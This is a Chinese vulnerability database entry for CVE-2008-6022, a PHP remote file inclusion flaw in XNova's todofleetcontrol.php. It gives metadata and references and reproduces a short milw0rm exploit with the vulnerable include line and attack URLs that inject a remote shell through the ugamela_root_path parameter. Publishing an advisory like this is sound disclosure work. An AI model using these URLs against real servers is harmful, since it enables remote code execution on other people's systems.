XNova ‘includes/todofleetcontrol.php' PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115916 漏洞类型 代码注入
发布时间 2008-08-17 更新时间 2009-03-18
CVE编号 CVE-2008-6022 CNNVD-ID CNNVD-200902-676
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/6254
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-676
|漏洞详情
Xnova的includes/todofleetcontrol.php存在PHP远程文件包含漏洞。远程攻击者可以借助ugamela_root_path参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
##################################################################################################################################
Name: Xnova(Ogame) Remote File Inclusion
Author : NuclearHaxor
Contact MSN: nuclearhaxor@hotmail.com

homepage of xnova: http://xnova.fr/

Vuln file: includes/todofleetcontrol.php
Vuln line: include($ugamela_root_path . 'includes/functions/FlyingFleetHandler.'.$phpEx); -> but no declared ugamela_root_path ;)

Exploit(this exploit works in 90% targets):

------
target.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]?
or new version of xnova:
target.com/includes/todofleetcontrol.php?xnova_root_path=[shell]?
------

FUckZZz to Cybernet1c(2) aka ph4nt0mh4ck3r && Cr4wl aka Raz0r

##################################################################################################################################

# milw0rm.com [2008-08-17]
|参考资料

来源:XF
名称:xnova-todofleetcontrol-file-include(44513)
链接:http://xforce.iss.net/xforce/xfdb/44513
来源:BID
名称:30715
链接:http://www.securityfocus.com/bid/30715
来源:MILW0RM
名称:6254
链接:http://www.milw0rm.com/exploits/6254